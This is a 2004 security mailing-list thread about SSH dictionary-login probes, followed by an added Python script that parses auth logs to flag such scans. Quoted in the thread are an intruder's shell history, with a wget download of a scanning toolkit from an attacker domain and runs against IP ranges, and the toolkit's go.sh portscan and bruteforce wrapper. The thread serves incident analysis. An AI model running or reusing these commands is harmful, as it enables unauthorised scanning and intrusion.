That certainly is a good point. On the other hand I have this in the log
of one of my machines:

Jul 27 2004 14:38 GMT:

Failed password for illegal user test from 220.80.108.73 port 60972 ssh2
Failed password for root from 220.80.108.73 port 60902 ssh2
Failed password for root from 220.80.108.73 port 60825 ssh2
Failed password for root from 220.80.108.73 port 60742 ssh2
Failed password for illegal user user from 220.80.108.73 port 60670 ssh2
Failed password for illegal user admin from 220.80.108.73 port 60584 ssh2
Failed password for illegal user admin from 220.80.108.73 port 60515 ssh2
Failed password for illegal user guest from 220.80.108.73 port 60419 ssh2
Failed password for illegal user test from 220.80.108.73 port 60339 ssh2


Jul 20 2004 16:20 GMT:

Failed password for illegal user test from 131.234.157.10 port 37301 ssh2
Failed password for root from 131.234.157.10 port 37284 ssh2
Failed password for root from 131.234.157.10 port 37253 ssh2
Failed password for root from 131.234.157.10 port 37267 ssh2
Failed password for illegal user admin from 131.234.157.10 port 37210 ssh2
Failed password for illegal user admin from 131.234.157.10 port 37191 ssh2
Failed password for illegal user user from 131.234.157.10 port 37229 ssh2
Failed password for illegal user test from 131.234.157.10 port 37133 ssh2
Failed password for illegal user guest from 131.234.157.10 port 37164 ssh2


And something similar on Jul 20 2004 01:10 GMT from 66.250.111.33.

I'm wondering if it has anything to do with these ssh probes. I'm
getting the 'guest and test' probes as well, but far more recently
(starting Jul 28).

Please note that there are root attempts as well in the logs. Also
please note that there are every time 2 admin, 3 root, 2 test, 1 user and
1 guest attempts, so it looks like a simple dictionary attack with some
basic empty/weak passwords.

It's just a wild guess but could it be that there are 2 stages of this
'thing'?

Hope it helps...

--jd

Rui Pedro Figueira Covelo wrote:
> I noticed that the .bash_history is from the root account. Not guest
> or test. If this .bash_history is real, the fact that someone got root
> proves that someone used an exploit rather than guessing a weak password
> of a guest or test account, right?
>
>
> Dan Margolis wrote:
> | I grabbed the tgz before it's too late. I plan on running it with a
> | sniffer so I can see what it's doing--that should indicate whether it's
> | really using some unknown ssh exploit (I'm afraid I'm not a whiz at
> | disassembly, so I'd rather not take that route). I tend to think it's
> | not; there was an OpenSSH vuln a while back that this guy's Debian
> | machine might still be vulnerable to, if it wasn't patched in a year. If
> | there were an unknown vulnerability, he'd be having a lot more success
> | and we'd be seeing this a whole lot more (unless we're all rooted and
> | don't know it).
> |
> | Anyone have any more information on this?
> |
> | -------- Original Message --------
> |
> | From: Stefan Janecek <stefan.janecek@×××.at>
> | To: full-disclosure@××××××××××××.com
> |
> |
> | Hmmm - I have also been getting those login attempts, but thought them to
> | be harmless. Maybe they are not *that* harmless, though... Today I
> | managed to get my hands on a machine that was originating such login
> | attempts. I must admit I am far from being a linux security expert, but
> | this is what I've found out up to now:
> |
> | Whoever broke into the machine did not take any attempts to cover up his
> | tracks - this is what I found in /root/.bash_history:
> |
> | ------
> | id
> | uname -a
> | w
> | id
> | ls
> | wgte frauder.us/linux/ssh.tgz
> | wget frauder.us/linux/ssh.tgz
> | tar xzvf ssh.tgz
> | tar xvf ssh.tgz
> | ls
> | cd ssh
> | ls
> | ./go.sh 195.178
> | ls
> | pico uniq.txt
> | vi uniq.txt
> | ls
> | rm -rf uniq.txt
> | ./go.sh 167.205
> | ls
> | rm -rf uniq.txt vuln.txt
> | ./go.sh 202.148.20
> | ./go.sh 212.92
> | ./go.sh 195.197
> | ./go.sh 147.32
> | ./go.sh 213.168
> | ./go.sh 134.176
> | ./go.sh 195.83
> | ------
> |
> | um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
> | binaries:
> |
> | go.sh:
> | -------
> | ./ss 22 -b $1 -i eth0 -s 6
> | cat bios.txt |sort | uniq > uniq.txt
> | ./sshf
> | -------
> |
> | * 'ss' apparently is some sort of portscanner
> | * 'sshf' connects to every IP in uniq.txt and tries to log in as user
> | 'test' first, then as user 'guest' (according to tcpdump).
> |
> | This does not seem to be a stupid brute force attack, as there is only
> | one login attempt per user. Could it be that the tool tries to exploit
> | some vulnerability in the sshd, and just tries to look harmless by using
> | 'test' and 'guest' as usernames?
> |
> | The compromised machine was running an old debian woody installation
> | which had not been upgraded for at least one year, the sshd version
> | string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
> |
> | As already mentioned, I am far from being an expert, but if I can assist
> | in further testing, then let me know. Please CC me, I am not subscribed
> | to the list.
> |
> | cheers,
> | Stefan
> |
> |
> | _______________________________________________
> | Full-Disclosure - We believe in it.
> | Charter: http://lists.netsys.com/full-disclosure-charter.html
> |
> |
> | --
> | Dan ("KrispyKringle")
> | Gentoo Linux Security Coordinator
>
> --
> gentoo-security@g.o mailing list
>
>

--
gentoo-security@g.o mailing list
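A defender-side way to pull the pattern jd describes out of an auth log, as an added example that is not part of this thread or of any tool it mentions: it parses the sshd "Failed password" lines, counts failures per source and per username, and flags sources that match the 2 admin / 3 root / 2 test / 1 user / 1 guest mix. The sample log is constructed from the Jul 27 lines above, and the flagging thresholds are assumptions.

```python
import re
from collections import Counter, defaultdict

# Matches the sshd "Failed password" lines quoted in the thread. OpenSSH 3.x wrote
# "illegal user" for nonexistent accounts; later releases write "invalid user".
FAILED_RE = re.compile(
    r"Failed password for (?:(?P<noacct>illegal|invalid) user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+) ssh2"
)

# Username mix jd saw in every burst: 2 admin, 3 root, 2 test, 1 user, 1 guest.
THREAD_SIGNATURE = Counter({"root": 3, "admin": 2, "test": 2, "user": 1, "guest": 1})

# Constructed sample: the Jul 27 burst from the message plus one unrelated line.
SAMPLE_LOG = """\
Failed password for illegal user test from 220.80.108.73 port 60972 ssh2
Failed password for root from 220.80.108.73 port 60902 ssh2
Failed password for root from 220.80.108.73 port 60825 ssh2
Failed password for root from 220.80.108.73 port 60742 ssh2
Failed password for illegal user user from 220.80.108.73 port 60670 ssh2
Failed password for illegal user admin from 220.80.108.73 port 60584 ssh2
Failed password for illegal user admin from 220.80.108.73 port 60515 ssh2
Failed password for illegal user guest from 220.80.108.73 port 60419 ssh2
Failed password for illegal user test from 220.80.108.73 port 60339 ssh2
Accepted publickey for alice from 192.0.2.10 port 51000 ssh2
"""

def parse_failed_logins(lines):
    """Yield (ip, user, account_exists) per failure line; other lines are skipped."""
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            yield m.group("ip"), m.group("user"), m.group("noacct") is None

def failures_by_source(lines):
    """Map each source IP to a Counter of the usernames it failed against."""
    per_ip = defaultdict(Counter)
    for ip, user, _ in parse_failed_logins(lines):
        per_ip[ip][user] += 1
    return dict(per_ip)

def flag_dictionary_scans(per_ip, min_attempts=5, min_users=3):
    """Return {ip: (total failures, matches THREAD_SIGNATURE)} for scanning sources."""
    flagged = {}
    for ip, users in per_ip.items():
        total = sum(users.values())
        if total >= min_attempts and len(users) >= min_users:
            flagged[ip] = (total, users == THREAD_SIGNATURE)
    return flagged
```

Feed it `sys.stdin` or an opened auth log instead of `SAMPLE_LOG.splitlines()` to run it over real data; a source flagged with the signature match is the same scanner jd and Stefan describe.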